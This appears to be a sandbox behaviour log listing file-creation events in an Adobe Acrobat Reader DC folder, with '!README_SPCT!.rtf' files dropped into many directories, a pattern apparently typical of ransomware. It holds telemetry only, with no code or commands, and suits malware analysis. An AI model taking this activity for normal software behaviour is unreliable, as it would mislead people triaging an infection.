| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\Comb_field_White@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_TypeTextFields_White@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\A12_TypeTextFields_White@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\text_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\text.cur | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons_retina_thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\new_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ind_prog.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Stamp.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-ma\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\JSByteCodeWin.bin | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-cn\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pt-br\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner_mini.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ru-ru\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons_ie8.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-fr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-tw\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text.cur | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\dd_arrow_small.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\warning.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\Flash.mpp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\reflow.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-up.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvDX9.x3d | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\convertpdf-rna-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\br.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\activate-more-tools-2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\form_responses.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_email.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tr.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\beta-mobile-2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\example_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\illustrations.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nb-no\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
